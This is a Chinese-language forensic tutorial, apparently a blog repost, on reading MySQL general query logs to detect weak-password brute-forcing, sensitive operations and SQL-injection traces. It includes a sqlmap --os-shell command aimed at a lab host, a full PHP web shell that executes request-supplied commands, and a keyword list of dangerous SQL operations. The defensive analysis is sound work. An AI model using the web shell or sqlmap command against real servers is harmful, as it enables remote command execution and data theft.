MySQL日志分析在应急响应中的应用与优化策略

常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析&＃xff0c;可以发现攻击行为&＃xff0c;进一步还原攻击场景及追溯攻击源。

1、 Mysql日志分析

general query log能记录成功连接和每次执行的查询&＃xff0c;我们可以将它用作安全布防的一部分&＃xff0c;为故障分析或黑客事件后的调查提供依据。

1、查看log配置信息
show variables like &＃39;%general%&＃39;;
2、开启日志
SET GLOBAL general_log &＃61; &＃39;On&＃39;;
3、指定日志文件路径
#SET GLOBAL general_log_file &＃61; &＃39;/var/lib/mysql/mysql.log&＃39;;


比如&＃xff0c;当我访问 /test.php?id&＃61;1&＃xff0c;此时我们得到这样的日志&＃xff1a;

190604 14:46:14 14 Connect root&＃64;localhost on 14 Init DB test14 Query SELECT * FROM admin WHERE id &＃61; 114 Quit &＃96;


我们按列来解析一下&＃xff1a;

第一列:Time&＃xff0c;时间列&＃xff0c;前面一个是日期,后面一个是小时和分钟&＃xff0c;有一些不显示的原因是因为这些sql语句几乎是同时执行的,所以就不另外记录时间了。
第二列:Id&＃xff0c;就是show processlist出来的第一列的线程ID,对于长连接和一些比较耗时的sql语句,你可以精确找出究竟是那一条那一个线程在运行。
第三列:Command&＃xff0c;操作类型&＃xff0c;比如Connect就是连接数据库&＃xff0c;Query就是查询数据库(增删查改都显示为查询)&＃xff0c;可以特定过虑一些操作。
第四列:Argument&＃xff0c;详细信息&＃xff0c;例如 Connect root&＃64;localhost on 意思就是连接数据库&＃xff0c;如此类推,接下面的连上数据库之后,做了什么查询的操作。


2、 登录成功/失败

我们来做个简单的测试吧&＃xff0c;使用我以前自己开发的弱口令工具来扫一下&＃xff0c;字典设置比较小&＃xff0c;2个用户&＃xff0c;4个密码&＃xff0c;共8组。

MySQL中的log记录是这样子&＃xff1a;

Time Id Command Argument190601 22:03:20 98 Connect root&＃64;192.168.204.1 on 98 Connect Access denied for user &＃39;root&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)103 Connect mysql&＃64;192.168.204.1 on 103 Connect Access denied for user &＃39;mysql&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)104 Connect mysql&＃64;192.168.204.1 on 104 Connect Access denied for user &＃39;mysql&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)100 Connect root&＃64;192.168.204.1 on 101 Connect root&＃64;192.168.204.1 on 101 Connect Access denied for user &＃39;root&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)99 Connect root&＃64;192.168.204.1 on 99 Connect Access denied for user &＃39;root&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)105 Connect mysql&＃64;192.168.204.1 on 105 Connect Access denied for user &＃39;mysql&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)100 Query set autocommit&＃61;0102 Connect mysql&＃64;192.168.204.1 on 102 Connect Access denied for user &＃39;mysql&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)100 Quit &＃96;


你知道在这个口令猜解过程中&＃xff0c;哪个是成功的吗&＃xff1f;

利用爆破工具&＃xff0c;一个口令猜解成功的记录是这样子的&＃xff1a;

190601 22:03:20 100 Connect root&＃64;192.168.204.1 on 100 Query set autocommit&＃61;0100 Quit


但是&＃xff0c;如果你是用其他方式&＃xff0c;可能会有一点点不一样的哦。

Navicat for MySQL登录&＃xff1a;

190601 22:14:07 106 Connect root&＃64;192.168.204.1 on 106 Query SET NAMES utf8106 Query SHOW VARIABLES LIKE &＃39;lower_case_%&＃39;106 Query SHOW VARIABLES LIKE &＃39;profiling&＃39;106 Query SHOW DATABASES


命令行登录&＃xff1a;

190601 22:17:25 111 Connect root&＃64;localhost on 111 Query select &＃64;&＃64;version_comment limit 1
190601 22:17:56 111 Quit


这个差别在于&＃xff0c;不同的数据库连接工具&＃xff0c;它在连接数据库初始化的过程中是不同的。通过这样的差别&＃xff0c;我们可以简单判断出用户是通过连接数据库的方式。

另外&＃xff0c;不管你是爆破工具、Navicat for MySQL、还是命令行&＃xff0c;登录失败都是一样的记录。

登录失败的记录&＃xff1a;

102 Connect mysql&＃64;192.168.204.1 on
102 Connect Access denied for user &＃39;mysql&＃39;&＃64;&＃39;192.168.204.1&＃39; (using password: YES)


利用shell命令进行简单的分析&＃xff1a;

#有哪些IP在爆破&＃xff1f;
grep "Access denied" mysql.log |cut -d "&＃39;" -f4|uniq -c|sort -nr27 192.168.204.1#爆破用户名字典都有哪些&＃xff1f;
grep "Access denied" mysql.log |cut -d "&＃39;" -f2|uniq -c|sort -nr13 mysql12 root1 root1 mysql

在日志分析中&＃xff0c;特别需要注意一些敏感的操作行为&＃xff0c;比如删表、备库&＃xff0c;读写文件等。关键词&＃xff1a;drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。

敏感数据库表&＃xff1a;SELECT * from mysql.user、SELECT * from mysql.func

3、 SQL注入入侵痕迹

在利用SQL注入漏洞的过程中&＃xff0c;我们会尝试利用sqlmap的–os-shell参数取得shell&＃xff0c;如操作不慎&＃xff0c;可能留下一些sqlmap创建的临时表和自定义函数。我们先来看一下sqlmap os-shell参数的用法以及原理&＃xff1a;

1、构造一个SQL注入点&＃xff0c;开启Burp监听8080端口

sqlmap.py -u http://192.168.204.164/sql.php?id&＃61;1 --os-shell --proxy&＃61;http://127.0.0.1:8080

HTTP通讯过程如下&＃xff1a;

创建了一个临时文件tmpbwyov.php&＃xff0c;通过访问这个木马执行系统命令&＃xff0c;并返回到页面展示。

tmpbwyov.php&＃xff1a; $c&＃61;$_REQUEST["cmd"];&＃64;set_time_limit(0);&＃64;ignore_user_abort(1);&＃64;ini_set(&＃39;max_execution_time&＃39;,0);$z&＃61;&＃64;ini_get(&＃39;disable_functions&＃39;);if(!empty($z)){$z&＃61;preg_replace(&＃39;/[, ]&＃43;/&＃39;,&＃39;,&＃39;,$z);$z&＃61;explode(&＃39;,&＃39;,$z);$z&＃61;array_map(&＃39;trim&＃39;,$z);}else{$z&＃61;array();}$c&＃61;$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f(&＃39;system&＃39;)){ob_start();system($c);$w&＃61;ob_get_contents();ob_end_clean();}elseif(f(&＃39;proc_open&＃39;)){$y&＃61;proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w&＃61;NULL;while(!feof($t[1])){$w.&＃61;fread($t[1],512);}&＃64;proc_close($y);}elseif(f(&＃39;shell_exec&＃39;)){$w&＃61;shell_exec($c);}elseif(f(&＃39;passthru&＃39;)){ob_start();passthru($c);$w&＃61;ob_get_contents();ob_end_clean();}elseif(f(&＃39;popen&＃39;)){$x&＃61;popen($c,r);$w&＃61;NULL;if(is_resource($x)){while(!feof($x)){$w.&＃61;fread($x,512);}}&＃64;pclose($x);}elseif(f(&＃39;exec&＃39;)){$w&＃61;array();exec($c,$w);$w&＃61;join(chr(10),$w).chr(10);}else{$w&＃61;0;}print "

".$w."

创建了一个临时表sqlmapoutput&＃xff0c;调用存储过程执行系统命令将数据写入临时表&＃xff0c;然后取临时表中的数据展示到前端。

通过查看网站目录中最近新建的可疑文件&＃xff0c;可以判断是否发生过sql注入漏洞攻击事件。

检查方法&＃xff1a;

1、检查网站目录下&＃xff0c;是否存在一些木马文件&＃xff1a;

2、检查是否有UDF提权、MOF提权痕迹

检查目录是否有异常文件

mysql\lib\plugin

c:/windows/system32/wbem/mof/

检查函数是否删除

select * from mysql.func

3、结合web日志分析。

免责声明&＃xff1a;本人坚决反对利用教学方法进行犯罪的行为&＃xff0c;一切犯罪行为必将受到严惩&＃xff0c;绿色网络需要我们共同维护&＃xff0c;更推荐大家了解它们背后的原理&＃xff0c;更好地进行防护。禁止任何人转载到其他站点&＃xff0c;禁止用于任何非法用途。如有任何人凭此做何非法事情&＃xff0c;均于笔者无关&＃xff0c;特此声明。